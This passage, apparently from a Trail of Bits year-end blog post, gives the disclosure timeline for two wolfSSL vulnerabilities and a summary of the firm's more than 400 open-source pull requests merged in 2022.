  • September 12, 2022: Reported CVE-2022-39173 to wolfSSL.

For CVE-2022-39173:

  • September 12, 2022: wolfSSL maintainers confirmed and fixed the vulnerability.
  • September 28, 2022: wolfSSL released a fixed version, 5.5.1.
  • October 09, 2022: Reported CVE-2022-42905 to wolfSSL.

For CVE-2022-42905:

  • October 10, 2022: wolfSSL maintainers confirmed and fixed the vulnerability.
  • October 28, 2022: wolfSSL released a fixed version, 5.5.2.

We would like to thank the team at wolfSSL for working swiftly with us to address these issues; they fixed one of the vulnerabilities on the same day it was submitted to them. The people involved at INRIA and Trail of Bits even got some swag delivered in appreciation of the disclosure.

Another prolific year of open-source contributions

By Samuel Moelius

This time last year, we wrote about the more than 190 Trail of Bits-authored pull requests that were merged into non-Trail of Bits repositories in 2021. In 2022, we continued that trend by having more than 400 pull requests merged into non-Trail of Bits repositories!

Why is this significant? While we take great pride in the tools that we develop, we recognize that we benefit from tools maintained outside of Trail of Bits. When one of those tools doesn’t work as we expect, we try to fix it. When a tool doesn’t fill the need we think it was meant to, we try to improve it. In short, we try to give back to the community that gives so much to us.

Here are a few highlights from the list of PRs at the end of this blog post:

The projects named below represent software of the highest quality. Software of this caliber doesn’t come from just merging PRs and publishing new releases; it comes from careful planning, prioritizing features, familiarity with related projects, and an understanding of the role that a project plays within the larger software ecosystem. We thank these projects’ maintainers both for the work the public sees and for innumerable hours spent on work the public doesn’t see.

We wish you a happy, safe, and similarly productive 2023!

Some of Trail of Bits’s 2022 Open-Source Contributions


Tech Infrastructure 

Software testing tools

Blockchain software